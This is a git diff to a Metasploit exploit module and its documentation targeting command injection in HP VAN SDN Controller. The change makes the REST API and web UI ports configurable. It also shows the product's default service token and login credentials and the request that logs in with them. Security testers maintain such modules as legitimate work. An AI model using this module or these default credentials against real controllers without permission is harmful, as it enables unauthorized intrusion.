diff --git a/documentation/modules/exploit/linux/http/hp_van_sdn_cmd_inject.md b/documentation/modules/exploit/linux/http/hp_van_sdn_cmd_inject.md
index d4bac36517..4a205ffb79 100644
--- a/documentation/modules/exploit/linux/http/hp_van_sdn_cmd_inject.md
+++ b/documentation/modules/exploit/linux/http/hp_van_sdn_cmd_inject.md
@@ -18,6 +18,14 @@ Tested on 2.7.18.0503.
 
 ## Options
 
+**RPORT**
+
+Set this to the port for the REST API, usually 8081.
+
+**WEBUI_PORT**
+
+Set this to the port for the web UI, usually 8443.
+
 **TOKEN**
 
 Set this to the service token. Defaults to `AuroraSdnToken37`.
diff --git a/modules/exploits/linux/http/hp_van_sdn_cmd_inject.rb b/modules/exploits/linux/http/hp_van_sdn_cmd_inject.rb
index aa48510f23..30b21aa614 100644
--- a/modules/exploits/linux/http/hp_van_sdn_cmd_inject.rb
+++ b/modules/exploits/linux/http/hp_van_sdn_cmd_inject.rb
@@ -56,10 +56,12 @@ class MetasploitModule < Msf::Exploit::Remote
         ]
       ],
       'DefaultTarget'      => 0,
-      'DefaultOptions'     => {'RPORT' => 8081, 'SSL' => true}
+      'DefaultOptions'     => {'SSL' => true}
     ))
 
     register_options([
+      OptPort.new('RPORT',      [true,  'REST API port', 8081]),
+      OptPort.new('WEBUI_PORT', [true,  'Web UI port for creds login', 8443]),
       OptString.new('TOKEN',    [false, 'Service token', 'AuroraSdnToken37']),
       OptString.new('USERNAME', [false, 'Service username', 'sdn']),
       OptString.new('PASSWORD', [false, 'Service password', 'skyline'])
@@ -189,7 +191,7 @@ class MetasploitModule < Msf::Exploit::Remote
     res = send_request_cgi(
       'method'    => 'POST',
       'uri'       => '/sdn/ui/app/login',
-      'rport'     => 8443,
+      'rport'     => datastore['WEBUI_PORT'],
       'vars_post' => {'username' => username, 'password' => password}
     )